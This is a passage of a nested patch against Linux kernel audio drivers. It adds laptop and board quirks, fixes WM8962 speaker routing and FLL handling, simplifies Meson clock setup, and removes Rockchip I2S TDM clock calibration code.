+ 	SND_PCI_QUIRK(0x103c, 0x869d, "HP", ALC236_FIXUP_HP_MUTE_LED),
+@@ -10248,6 +10311,7 @@ static const struct hda_model_fixup alc269_fixup_models[] = {
+ 	{.id = ALC295_FIXUP_HP_OMEN, .name = "alc295-hp-omen"},
+ 	{.id = ALC285_FIXUP_HP_SPECTRE_X360, .name = "alc285-hp-spectre-x360"},
+ 	{.id = ALC285_FIXUP_HP_SPECTRE_X360_EB1, .name = "alc285-hp-spectre-x360-eb1"},
++	{.id = ALC285_FIXUP_HP_ENVY_X360, .name = "alc285-hp-envy-x360"},
+ 	{.id = ALC287_FIXUP_IDEAPAD_BASS_SPK_AMP, .name = "alc287-ideapad-bass-spk-amp"},
+ 	{.id = ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN, .name = "alc287-yoga9-bass-spk-pin"},
+ 	{.id = ALC623_FIXUP_LENOVO_THINKSTATION_P340, .name = "alc623-lenovo-thinkstation-p340"},
+diff --git a/sound/soc/amd/acp/acp-sof-mach.c b/sound/soc/amd/acp/acp-sof-mach.c
+index f19f064a75272..972600d271586 100644
+--- a/sound/soc/amd/acp/acp-sof-mach.c
++++ b/sound/soc/amd/acp/acp-sof-mach.c
+@@ -114,16 +114,14 @@ static int acp_sof_probe(struct platform_device *pdev)
+ 	card->num_controls = ARRAY_SIZE(acp_controls);
+ 	card->drvdata = (struct acp_card_drvdata *)pdev->id_entry->driver_data;
+ 
+-	acp_sofdsp_dai_links_create(card);
++	ret = acp_sofdsp_dai_links_create(card);
++	if (ret)
++		return dev_err_probe(&pdev->dev, ret, "Failed to create DAI links\n");
+ 
+ 	ret = devm_snd_soc_register_card(&pdev->dev, card);
+-	if (ret) {
+-		dev_err(&pdev->dev,
+-				"devm_snd_soc_register_card(%s) failed: %d\n",
+-				card->name, ret);
+-		return ret;
+-	}
+-
++	if (ret)
++		return dev_err_probe(&pdev->dev, ret,
++				     "Failed to register card(%s)\n", card->name);
+ 	return 0;
+ }
+ 
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 28da4e1858d7e..e0f406b6646ba 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -199,6 +199,20 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21HY"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "21J2"),
++		}
++	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "21J0"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -227,6 +241,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "82QF"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82UU"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/rt5645.c b/sound/soc/codecs/rt5645.c
+index 844d14d4c9a51..aac9140749968 100644
+--- a/sound/soc/codecs/rt5645.c
++++ b/sound/soc/codecs/rt5645.c
+@@ -3802,6 +3802,16 @@ static const struct dmi_system_id dmi_platform_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_BOARD_VENDOR, "AMI Corporation"),
+ 		  DMI_EXACT_MATCH(DMI_BOARD_NAME, "Cherry Trail CR"),
+ 		  DMI_EXACT_MATCH(DMI_BOARD_VERSION, "Default string"),
++		  /*
++		   * Above strings are too generic, LattePanda BIOS versions for
++		   * all 4 hw revisions are:
++		   * DF-BI-7-S70CR100-*
++		   * DF-BI-7-S70CR110-*
++		   * DF-BI-7-S70CR200-*
++		   * LP-BS-7-S70CR700-*
++		   * Do a partial match for S70CR to avoid false positive matches.
++		   */
++		  DMI_MATCH(DMI_BIOS_VERSION, "S70CR"),
+ 		},
+ 		.driver_data = (void *)&lattepanda_board_platform_data,
+ 	},
+diff --git a/sound/soc/codecs/wm8962.c b/sound/soc/codecs/wm8962.c
+index b901e4c65e8a5..d215e58c4a7b3 100644
+--- a/sound/soc/codecs/wm8962.c
++++ b/sound/soc/codecs/wm8962.c
+@@ -2229,6 +2229,9 @@ SND_SOC_DAPM_PGA_E("HPOUT", SND_SOC_NOPM, 0, 0, NULL, 0, hp_event,
+ 
+ SND_SOC_DAPM_OUTPUT("HPOUTL"),
+ SND_SOC_DAPM_OUTPUT("HPOUTR"),
++
++SND_SOC_DAPM_PGA("SPKOUTL Output", WM8962_CLASS_D_CONTROL_1, 6, 0, NULL, 0),
++SND_SOC_DAPM_PGA("SPKOUTR Output", WM8962_CLASS_D_CONTROL_1, 7, 0, NULL, 0),
+ };
+ 
+ static const struct snd_soc_dapm_widget wm8962_dapm_spk_mono_widgets[] = {
+@@ -2236,7 +2239,6 @@ SND_SOC_DAPM_MIXER("Speaker Mixer", WM8962_MIXER_ENABLES, 1, 0,
+ 		   spkmixl, ARRAY_SIZE(spkmixl)),
+ SND_SOC_DAPM_MUX_E("Speaker PGA", WM8962_PWR_MGMT_2, 4, 0, &spkoutl_mux,
+ 		   out_pga_event, SND_SOC_DAPM_POST_PMU),
+-SND_SOC_DAPM_PGA("Speaker Output", WM8962_CLASS_D_CONTROL_1, 7, 0, NULL, 0),
+ SND_SOC_DAPM_OUTPUT("SPKOUT"),
+ };
+ 
+@@ -2251,9 +2253,6 @@ SND_SOC_DAPM_MUX_E("SPKOUTL PGA", WM8962_PWR_MGMT_2, 4, 0, &spkoutl_mux,
+ SND_SOC_DAPM_MUX_E("SPKOUTR PGA", WM8962_PWR_MGMT_2, 3, 0, &spkoutr_mux,
+ 		   out_pga_event, SND_SOC_DAPM_POST_PMU),
+ 
+-SND_SOC_DAPM_PGA("SPKOUTR Output", WM8962_CLASS_D_CONTROL_1, 7, 0, NULL, 0),
+-SND_SOC_DAPM_PGA("SPKOUTL Output", WM8962_CLASS_D_CONTROL_1, 6, 0, NULL, 0),
+-
+ SND_SOC_DAPM_OUTPUT("SPKOUTL"),
+ SND_SOC_DAPM_OUTPUT("SPKOUTR"),
+ };
+@@ -2366,12 +2365,18 @@ static const struct snd_soc_dapm_route wm8962_spk_mono_intercon[] = {
+ 	{ "Speaker PGA", "Mixer", "Speaker Mixer" },
+ 	{ "Speaker PGA", "DAC", "DACL" },
+ 
+-	{ "Speaker Output", NULL, "Speaker PGA" },
+-	{ "Speaker Output", NULL, "SYSCLK" },
+-	{ "Speaker Output", NULL, "TOCLK" },
+-	{ "Speaker Output", NULL, "TEMP_SPK" },
++	{ "SPKOUTL Output", NULL, "Speaker PGA" },
++	{ "SPKOUTL Output", NULL, "SYSCLK" },
++	{ "SPKOUTL Output", NULL, "TOCLK" },
++	{ "SPKOUTL Output", NULL, "TEMP_SPK" },
+ 
+-	{ "SPKOUT", NULL, "Speaker Output" },
++	{ "SPKOUTR Output", NULL, "Speaker PGA" },
++	{ "SPKOUTR Output", NULL, "SYSCLK" },
++	{ "SPKOUTR Output", NULL, "TOCLK" },
++	{ "SPKOUTR Output", NULL, "TEMP_SPK" },
++
++	{ "SPKOUT", NULL, "SPKOUTL Output" },
++	{ "SPKOUT", NULL, "SPKOUTR Output" },
+ };
+ 
+ static const struct snd_soc_dapm_route wm8962_spk_stereo_intercon[] = {
+@@ -2914,8 +2919,12 @@ static int wm8962_set_fll(struct snd_soc_component *component, int fll_id, int s
+ 	switch (fll_id) {
+ 	case WM8962_FLL_MCLK:
+ 	case WM8962_FLL_BCLK:
++		fll1 |= (fll_id - 1) << WM8962_FLL_REFCLK_SRC_SHIFT;
++		break;
+ 	case WM8962_FLL_OSC:
+ 		fll1 |= (fll_id - 1) << WM8962_FLL_REFCLK_SRC_SHIFT;
++		snd_soc_component_update_bits(component, WM8962_PLL2,
++					      WM8962_OSC_ENA, WM8962_OSC_ENA);
+ 		break;
+ 	case WM8962_FLL_INT:
+ 		snd_soc_component_update_bits(component, WM8962_FLL_CONTROL_1,
+@@ -2924,7 +2933,7 @@ static int wm8962_set_fll(struct snd_soc_component *component, int fll_id, int s
+ 				    WM8962_FLL_FRC_NCO, WM8962_FLL_FRC_NCO);
+ 		break;
+ 	default:
+-		dev_err(component->dev, "Unknown FLL source %d\n", ret);
++		dev_err(component->dev, "Unknown FLL source %d\n", source);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index 797d0a48d6066..094445036c20f 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -685,6 +685,18 @@ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
+ 					BYT_RT5640_SSP0_AIF1 |
+ 					BYT_RT5640_MCLK_EN),
+ 	},
++	{	/* Chuwi Vi8 dual-boot (CWI506) */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "i86"),
++			/* The above are too generic, also match BIOS info */
++			DMI_MATCH(DMI_BIOS_VERSION, "CHUWI2.D86JHBNR02"),
++		},
++		.driver_data = (void *)(BYTCR_INPUT_DEFAULTS |
++					BYT_RT5640_MONO_SPEAKER |
++					BYT_RT5640_SSP0_AIF1 |
++					BYT_RT5640_MCLK_EN),
++	},
+ 	{
+ 		/* Chuwi Vi10 (CWI505) */
+ 		.matches = {
+diff --git a/sound/soc/meson/aiu.c b/sound/soc/meson/aiu.c
+index 88e611e64d14f..077b9c0b6c4ca 100644
+--- a/sound/soc/meson/aiu.c
++++ b/sound/soc/meson/aiu.c
+@@ -218,11 +218,12 @@ static const char * const aiu_spdif_ids[] = {
+ static int aiu_clk_get(struct device *dev)
+ {
+ 	struct aiu *aiu = dev_get_drvdata(dev);
++	struct clk *pclk;
+ 	int ret;
+ 
+-	aiu->pclk = devm_clk_get(dev, "pclk");
+-	if (IS_ERR(aiu->pclk))
+-		return dev_err_probe(dev, PTR_ERR(aiu->pclk), "Can't get the aiu pclk\n");
++	pclk = devm_clk_get_enabled(dev, "pclk");
++	if (IS_ERR(pclk))
++		return dev_err_probe(dev, PTR_ERR(pclk), "Can't get the aiu pclk\n");
+ 
+ 	aiu->spdif_mclk = devm_clk_get(dev, "spdif_mclk");
+ 	if (IS_ERR(aiu->spdif_mclk))
+@@ -239,18 +240,6 @@ static int aiu_clk_get(struct device *dev)
+ 	if (ret)
+ 		return dev_err_probe(dev, ret, "Can't get the spdif clocks\n");
+ 
+-	ret = clk_prepare_enable(aiu->pclk);
+-	if (ret) {
+-		dev_err(dev, "peripheral clock enable failed\n");
+-		return ret;
+-	}
+-
+-	ret = devm_add_action_or_reset(dev,
+-				       (void(*)(void *))clk_disable_unprepare,
+-				       aiu->pclk);
+-	if (ret)
+-		dev_err(dev, "failed to add reset action on pclk");
+-
+ 	return ret;
+ }
+ 
+diff --git a/sound/soc/meson/aiu.h b/sound/soc/meson/aiu.h
+index 393b6c2307e49..0f94c8bf60818 100644
+--- a/sound/soc/meson/aiu.h
++++ b/sound/soc/meson/aiu.h
+@@ -33,7 +33,6 @@ struct aiu_platform_data {
+ };
+ 
+ struct aiu {
+-	struct clk *pclk;
+ 	struct clk *spdif_mclk;
+ 	struct aiu_interface i2s;
+ 	struct aiu_interface spdif;
+diff --git a/sound/soc/meson/axg-tdm-interface.c b/sound/soc/meson/axg-tdm-interface.c
+index c040c83637e02..028383f949efd 100644
+--- a/sound/soc/meson/axg-tdm-interface.c
++++ b/sound/soc/meson/axg-tdm-interface.c
+@@ -12,6 +12,9 @@
+ 
+ #include "axg-tdm.h"
+ 
++/* Maximum bit clock frequency according the datasheets */
++#define MAX_SCLK 100000000 /* Hz */
++
+ enum {
+ 	TDM_IFACE_PAD,
+ 	TDM_IFACE_LOOPBACK,
+@@ -155,19 +158,27 @@ static int axg_tdm_iface_startup(struct snd_pcm_substream *substream,
+ 		return -EINVAL;
+ 	}
+ 
+-	/* Apply component wide rate symmetry */
+ 	if (snd_soc_component_active(dai->component)) {
++		/* Apply component wide rate symmetry */
+ 		ret = snd_pcm_hw_constraint_single(substream->runtime,
+ 						   SNDRV_PCM_HW_PARAM_RATE,
+ 						   iface->rate);
+-		if (ret < 0) {
+-			dev_err(dai->dev,
+-				"can't set iface rate constraint\n");
+-			return ret;
+-		}
++
++	} else {
++		/* Limit rate according to the slot number and width */
++		unsigned int max_rate =
++			MAX_SCLK / (iface->slots * iface->slot_width);
++		ret = snd_pcm_hw_constraint_minmax(substream->runtime,
++						   SNDRV_PCM_HW_PARAM_RATE,
++						   0, max_rate);
+ 	}
+ 
+-	return 0;
++	if (ret < 0)
++		dev_err(dai->dev, "can't set iface rate constraint\n");
++	else
++		ret = 0;
++
++	return ret;
+ }
+ 
+ static int axg_tdm_iface_set_stream(struct snd_pcm_substream *substream,
+@@ -266,8 +277,8 @@ static int axg_tdm_iface_set_sclk(struct snd_soc_dai *dai,
+ 	srate = iface->slots * iface->slot_width * params_rate(params);
+ 
+ 	if (!iface->mclk_rate) {
+-		/* If no specific mclk is requested, default to bit clock * 4 */
+-		clk_set_rate(iface->mclk, 4 * srate);
++		/* If no specific mclk is requested, default to bit clock * 2 */
++		clk_set_rate(iface->mclk, 2 * srate);
+ 	} else {
+ 		/* Check if we can actually get the bit clock from mclk */
+ 		if (iface->mclk_rate % srate) {
+diff --git a/sound/soc/meson/t9015.c b/sound/soc/meson/t9015.c
+index 9c6b4dac68932..571f65788c592 100644
+--- a/sound/soc/meson/t9015.c
++++ b/sound/soc/meson/t9015.c
+@@ -48,7 +48,6 @@
+ #define POWER_CFG	0x10
+ 
+ struct t9015 {
+-	struct clk *pclk;
+ 	struct regulator *avdd;
+ };
+ 
+@@ -249,6 +248,7 @@ static int t9015_probe(struct platform_device *pdev)
+ 	struct t9015 *priv;
+ 	void __iomem *regs;
+ 	struct regmap *regmap;
++	struct clk *pclk;
+ 	int ret;
+ 
+ 	priv = devm_kzalloc(dev, sizeof(*priv), GFP_KERNEL);
+@@ -256,26 +256,14 @@ static int t9015_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 	platform_set_drvdata(pdev, priv);
+ 
+-	priv->pclk = devm_clk_get(dev, "pclk");
+-	if (IS_ERR(priv->pclk))
+-		return dev_err_probe(dev, PTR_ERR(priv->pclk), "failed to get core clock\n");
++	pclk = devm_clk_get_enabled(dev, "pclk");
++	if (IS_ERR(pclk))
++		return dev_err_probe(dev, PTR_ERR(pclk), "failed to get core clock\n");
+ 
+ 	priv->avdd = devm_regulator_get(dev, "AVDD");
+ 	if (IS_ERR(priv->avdd))
+ 		return dev_err_probe(dev, PTR_ERR(priv->avdd), "failed to AVDD\n");
+ 
+-	ret = clk_prepare_enable(priv->pclk);
+-	if (ret) {
+-		dev_err(dev, "core clock enable failed\n");
+-		return ret;
+-	}
+-
+-	ret = devm_add_action_or_reset(dev,
+-			(void(*)(void *))clk_disable_unprepare,
+-			priv->pclk);
+-	if (ret)
+-		return ret;
+-
+ 	ret = device_reset(dev);
+ 	if (ret) {
+ 		dev_err(dev, "reset failed\n");
+diff --git a/sound/soc/rockchip/rockchip_i2s_tdm.c b/sound/soc/rockchip/rockchip_i2s_tdm.c
+index 2550bd2a5e78c..2e36a97077b99 100644
+--- a/sound/soc/rockchip/rockchip_i2s_tdm.c
++++ b/sound/soc/rockchip/rockchip_i2s_tdm.c
+@@ -27,8 +27,6 @@
+ #define DEFAULT_MCLK_FS				256
+ #define CH_GRP_MAX				4  /* The max channel 8 / 2 */
+ #define MULTIPLEX_CH_MAX			10
+-#define CLK_PPM_MIN				-1000
+-#define CLK_PPM_MAX				1000
+ 
+ #define TRCM_TXRX 0
+ #define TRCM_TX 1
+@@ -55,20 +53,6 @@ struct rk_i2s_tdm_dev {
+ 	struct clk *hclk;
+ 	struct clk *mclk_tx;
+ 	struct clk *mclk_rx;
+-	/* The mclk_tx_src is parent of mclk_tx */
+-	struct clk *mclk_tx_src;
+-	/* The mclk_rx_src is parent of mclk_rx */
+-	struct clk *mclk_rx_src;
+-	/*
+-	 * The mclk_root0 and mclk_root1 are root parent and supplies for
+-	 * the different FS.
+-	 *
+-	 * e.g:
+-	 * mclk_root0 is VPLL0, used for FS=48000Hz
+-	 * mclk_root1 is VPLL1, used for FS=44100Hz
+-	 */
+-	struct clk *mclk_root0;
+-	struct clk *mclk_root1;
+ 	struct regmap *regmap;
+ 	struct regmap *grf;
+ 	struct snd_dmaengine_dai_dma_data capture_dma_data;
+@@ -78,19 +62,11 @@ struct rk_i2s_tdm_dev {
+ 	struct rk_i2s_soc_data *soc_data;
+ 	bool is_master_mode;
+ 	bool io_multiplex;
+-	bool mclk_calibrate;
+ 	bool tdm_mode;
+-	unsigned int mclk_rx_freq;
+-	unsigned int mclk_tx_freq;
+-	unsigned int mclk_root0_freq;
+-	unsigned int mclk_root1_freq;
+-	unsigned int mclk_root0_initial_freq;
+-	unsigned int mclk_root1_initial_freq;
+ 	unsigned int frame_width;
+ 	unsigned int clk_trcm;
+ 	unsigned int i2s_sdis[CH_GRP_MAX];
+ 	unsigned int i2s_sdos[CH_GRP_MAX];
+-	int clk_ppm;
+ 	int refcount;
+ 	spinlock_t lock; /* xfer lock */
+ 	bool has_playback;
+@@ -116,12 +92,6 @@ static void i2s_tdm_disable_unprepare_mclk(struct rk_i2s_tdm_dev *i2s_tdm)
+ {
+ 	clk_disable_unprepare(i2s_tdm->mclk_tx);
+ 	clk_disable_unprepare(i2s_tdm->mclk_rx);
+-	if (i2s_tdm->mclk_calibrate) {
+-		clk_disable_unprepare(i2s_tdm->mclk_tx_src);
+-		clk_disable_unprepare(i2s_tdm->mclk_rx_src);
+-		clk_disable_unprepare(i2s_tdm->mclk_root0);
+-		clk_disable_unprepare(i2s_tdm->mclk_root1);
+-	}
+ }
+ 
+ /**
+@@ -144,29 +114,9 @@ static int i2s_tdm_prepare_enable_mclk(struct rk_i2s_tdm_dev *i2s_tdm)
+ 	ret = clk_prepare_enable(i2s_tdm->mclk_rx);
+ 	if (ret)
+ 		goto err_mclk_rx;
+-	if (i2s_tdm->mclk_calibrate) {
+-		ret = clk_prepare_enable(i2s_tdm->mclk_tx_src);
+-		if (ret)
+-			goto err_mclk_rx;
+-		ret = clk_prepare_enable(i2s_tdm->mclk_rx_src);
+-		if (ret)
+-			goto err_mclk_rx_src;
+-		ret = clk_prepare_enable(i2s_tdm->mclk_root0);
+-		if (ret)
+-			goto err_mclk_root0;
+-		ret = clk_prepare_enable(i2s_tdm->mclk_root1);
+-		if (ret)
+-			goto err_mclk_root1;
+-	}
+ 
+ 	return 0;
+ 
+-err_mclk_root1:
+-	clk_disable_unprepare(i2s_tdm->mclk_root0);
+-err_mclk_root0:
+-	clk_disable_unprepare(i2s_tdm->mclk_rx_src);
+-err_mclk_rx_src:
+-	clk_disable_unprepare(i2s_tdm->mclk_tx_src);
+ err_mclk_rx:
+ 	clk_disable_unprepare(i2s_tdm->mclk_tx);
+ err_mclk_tx:
+@@ -566,159 +516,6 @@ static void rockchip_i2s_tdm_xfer_resume(struct snd_pcm_substream *substream,
+ 			   I2S_XFER_RXS_START);
+ }
+ 
+-static int rockchip_i2s_tdm_clk_set_rate(struct rk_i2s_tdm_dev *i2s_tdm,
+-					 struct clk *clk, unsigned long rate,
+-					 int ppm)
+-{
+-	unsigned long rate_target;
+-	int delta, ret;
+-
+-	if (ppm == i2s_tdm->clk_ppm)
+-		return 0;
+-
+-	if (ppm < 0)
+-		delta = -1;
+-	else
+-		delta = 1;
+-
+-	delta *= (int)div64_u64((u64)rate * (u64)abs(ppm) + 500000,
+-				1000000);
+-
+-	rate_target = rate + delta;
+-
+-	if (!rate_target)
+-		return -EINVAL;
+-
+-	ret = clk_set_rate(clk, rate_target);
+-	if (ret)
+-		return ret;
+-
+-	i2s_tdm->clk_ppm = ppm;
+-
+-	return 0;
+-}
+-
+-static int rockchip_i2s_tdm_calibrate_mclk(struct rk_i2s_tdm_dev *i2s_tdm,
+-					   struct snd_pcm_substream *substream,
+-					   unsigned int lrck_freq)
+-{
+-	struct clk *mclk_root;
+-	struct clk *mclk_parent;
+-	unsigned int mclk_root_freq;
+-	unsigned int mclk_root_initial_freq;
+-	unsigned int mclk_parent_freq;
+-	unsigned int div, delta;
+-	u64 ppm;
+-	int ret;
+-
+-	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
+-		mclk_parent = i2s_tdm->mclk_tx_src;
+-	else
+-		mclk_parent = i2s_tdm->mclk_rx_src;
+-
+-	switch (lrck_freq) {
+-	case 8000:
+-	case 16000:
+-	case 24000:
+-	case 32000:
+-	case 48000:
+-	case 64000:
+-	case 96000:
+-	case 192000:
+-		mclk_root = i2s_tdm->mclk_root0;
+-		mclk_root_freq = i2s_tdm->mclk_root0_freq;
+-		mclk_root_initial_freq = i2s_tdm->mclk_root0_initial_freq;
+-		mclk_parent_freq = DEFAULT_MCLK_FS * 192000;
+-		break;
+-	case 11025:
+-	case 22050:
+-	case 44100:
+-	case 88200:
+-	case 176400:
+-		mclk_root = i2s_tdm->mclk_root1;
+-		mclk_root_freq = i2s_tdm->mclk_root1_freq;
+-		mclk_root_initial_freq = i2s_tdm->mclk_root1_initial_freq;
+-		mclk_parent_freq = DEFAULT_MCLK_FS * 176400;
+-		break;
+-	default:
+-		dev_err(i2s_tdm->dev, "Invalid LRCK frequency: %u Hz\n",
+-			lrck_freq);
+-		return -EINVAL;
+-	}
+-
+-	ret = clk_set_parent(mclk_parent, mclk_root);
+-	if (ret)
+-		return ret;
+-
+-	ret = rockchip_i2s_tdm_clk_set_rate(i2s_tdm, mclk_root,
+-					    mclk_root_freq, 0);
+-	if (ret)
+-		return ret;
+-
+-	delta = abs(mclk_root_freq % mclk_parent_freq - mclk_parent_freq);
+-	ppm = div64_u64((uint64_t)delta * 1000000, (uint64_t)mclk_root_freq);
+-
+-	if (ppm) {
+-		div = DIV_ROUND_CLOSEST(mclk_root_initial_freq, mclk_parent_freq);
+-		if (!div)
+-			return -EINVAL;
+-
+-		mclk_root_freq = mclk_parent_freq * round_up(div, 2);
+-
+-		ret = clk_set_rate(mclk_root, mclk_root_freq);
+-		if (ret)
+-			return ret;
+-
+-		i2s_tdm->mclk_root0_freq = clk_get_rate(i2s_tdm->mclk_root0);
+-		i2s_tdm->mclk_root1_freq = clk_get_rate(i2s_tdm->mclk_root1);
+-	}
+-
+-	return clk_set_rate(mclk_parent, mclk_parent_freq);
+-}
+-
+-static int rockchip_i2s_tdm_set_mclk(struct rk_i2s_tdm_dev *i2s_tdm,
+-				     struct snd_pcm_substream *substream,
+-				     struct clk **mclk)
+-{
+-	unsigned int mclk_freq;
+-	int ret;
+-
+-	if (i2s_tdm->clk_trcm) {
+-		if (i2s_tdm->mclk_tx_freq != i2s_tdm->mclk_rx_freq) {
+-			dev_err(i2s_tdm->dev,
+-				"clk_trcm, tx: %d and rx: %d should be the same\n",
+-				i2s_tdm->mclk_tx_freq,
+-				i2s_tdm->mclk_rx_freq);
+-			return -EINVAL;
+-		}
+-
+-		ret = clk_set_rate(i2s_tdm->mclk_tx, i2s_tdm->mclk_tx_freq);
+-		if (ret)
+-			return ret;
+-
+-		ret = clk_set_rate(i2s_tdm->mclk_rx, i2s_tdm->mclk_rx_freq);
+-		if (ret)
+-			return ret;
+-
+-		/* mclk_rx is also ok. */
+-		*mclk = i2s_tdm->mclk_tx;
+-	} else {
+-		if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) {
+-			*mclk = i2s_tdm->mclk_tx;
+-			mclk_freq = i2s_tdm->mclk_tx_freq;
+-		} else {
+-			*mclk = i2s_tdm->mclk_rx;
+-			mclk_freq = i2s_tdm->mclk_rx_freq;
+-		}
+-
+-		ret = clk_set_rate(*mclk, mclk_freq);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	return 0;
+-}
+-
+ static int rockchip_i2s_ch_to_io(unsigned int ch, bool substream_capture)
+ {
+ 	if (substream_capture) {
+@@ -849,19 +646,17 @@ static int rockchip_i2s_tdm_hw_params(struct snd_pcm_substream *substream,
+ 				      struct snd_soc_dai *dai)
+ {
+ 	struct rk_i2s_tdm_dev *i2s_tdm = to_info(dai);
+-	struct clk *mclk;
+-	int ret = 0;
+ 	unsigned int val = 0;
+ 	unsigned int mclk_rate, bclk_rate, div_bclk = 4, div_lrck = 64;
++	int err;
+ 
+ 	if (i2s_tdm->is_master_mode) {
+-		if (i2s_tdm->mclk_calibrate)
+-			rockchip_i2s_tdm_calibrate_mclk(i2s_tdm, substream,
+-							params_rate(params));
++		struct clk *mclk = (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) ?
++			i2s_tdm->mclk_tx : i2s_tdm->mclk_rx;
+ 
+-		ret = rockchip_i2s_tdm_set_mclk(i2s_tdm, substream, &mclk);
+-		if (ret)
+-			return ret;
++		err = clk_set_rate(mclk, DEFAULT_MCLK_FS * params_rate(params));
++		if (err)
++			return err;
+ 
+ 		mclk_rate = clk_get_rate(mclk);
+ 		bclk_rate = i2s_tdm->frame_width * params_rate(params);
+@@ -969,96 +764,6 @@ static int rockchip_i2s_tdm_trigger(struct snd_pcm_substream *substream,
+ 	return 0;
+ }
+ 
+-static int rockchip_i2s_tdm_set_sysclk(struct snd_soc_dai *cpu_dai, int stream,
+-				       unsigned int freq, int dir)
+-{
+-	struct rk_i2s_tdm_dev *i2s_tdm = to_info(cpu_dai);
+-
+-	/* Put set mclk rate into rockchip_i2s_tdm_set_mclk() */
+-	if (i2s_tdm->clk_trcm) {
+-		i2s_tdm->mclk_tx_freq = freq;
+-		i2s_tdm->mclk_rx_freq = freq;
+-	} else {
+-		if (stream == SNDRV_PCM_STREAM_PLAYBACK)
+-			i2s_tdm->mclk_tx_freq = freq;
+-		else
+-			i2s_tdm->mclk_rx_freq = freq;
+-	}
+-
+-	dev_dbg(i2s_tdm->dev, "The target mclk_%s freq is: %d\n",
+-		stream ? "rx" : "tx", freq);
+-
+-	return 0;
+-}
+-
+-static int rockchip_i2s_tdm_clk_compensation_info(struct snd_kcontrol *kcontrol,
+-						  struct snd_ctl_elem_info *uinfo)
+-{
+-	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
+-	uinfo->count = 1;
+-	uinfo->value.integer.min = CLK_PPM_MIN;
+-	uinfo->value.integer.max = CLK_PPM_MAX;
+-	uinfo->value.integer.step = 1;
+-
+-	return 0;
+-}
+-
+-static int rockchip_i2s_tdm_clk_compensation_get(struct snd_kcontrol *kcontrol,
+-						 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct snd_soc_dai *dai = snd_kcontrol_chip(kcontrol);
+-	struct rk_i2s_tdm_dev *i2s_tdm = snd_soc_dai_get_drvdata(dai);
+-
+-	ucontrol->value.integer.value[0] = i2s_tdm->clk_ppm;
+-
+-	return 0;
+-}
+-
+-static int rockchip_i2s_tdm_clk_compensation_put(struct snd_kcontrol *kcontrol,
+-						 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct snd_soc_dai *dai = snd_kcontrol_chip(kcontrol);
+-	struct rk_i2s_tdm_dev *i2s_tdm = snd_soc_dai_get_drvdata(dai);
+-	int ret = 0, ppm = 0;
+-	int changed = 0;
+-	unsigned long old_rate;
+-
+-	if (ucontrol->value.integer.value[0] < CLK_PPM_MIN ||
+-	    ucontrol->value.integer.value[0] > CLK_PPM_MAX)
+-		return -EINVAL;
+-
+-	ppm = ucontrol->value.integer.value[0];
+-
+-	old_rate = clk_get_rate(i2s_tdm->mclk_root0);
+-	ret = rockchip_i2s_tdm_clk_set_rate(i2s_tdm, i2s_tdm->mclk_root0,
+-					    i2s_tdm->mclk_root0_freq, ppm);
+-	if (ret)
+-		return ret;
+-	if (old_rate != clk_get_rate(i2s_tdm->mclk_root0))
+-		changed = 1;
+-
+-	if (clk_is_match(i2s_tdm->mclk_root0, i2s_tdm->mclk_root1))
+-		return changed;
+-
+-	old_rate = clk_get_rate(i2s_tdm->mclk_root1);
+-	ret = rockchip_i2s_tdm_clk_set_rate(i2s_tdm, i2s_tdm->mclk_root1,
+-					    i2s_tdm->mclk_root1_freq, ppm);
+-	if (ret)
+-		return ret;
+-	if (old_rate != clk_get_rate(i2s_tdm->mclk_root1))
+-		changed = 1;
+-
+-	return changed;
+-}
+-
+-static struct snd_kcontrol_new rockchip_i2s_tdm_compensation_control = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_PCM,
+-	.name = "PCM Clock Compensation in PPM",
+-	.info = rockchip_i2s_tdm_clk_compensation_info,
+-	.get = rockchip_i2s_tdm_clk_compensation_get,
+-	.put = rockchip_i2s_tdm_clk_compensation_put,
+-};
+-
+ static int rockchip_i2s_tdm_dai_probe(struct snd_soc_dai *dai)
+ {
+ 	struct rk_i2s_tdm_dev *i2s_tdm = snd_soc_dai_get_drvdata(dai);
+@@ -1068,9 +773,6 @@ static int rockchip_i2s_tdm_dai_probe(struct snd_soc_dai *dai)
+ 	if (i2s_tdm->has_playback)
+ 		dai->playback_dma_data = &i2s_tdm->playback_dma_data;
+ 
+-	if (i2s_tdm->mclk_calibrate)
+-		snd_soc_add_dai_controls(dai, &rockchip_i2s_tdm_compensation_control, 1);
+-
+ 	return 0;
+ }
+ 
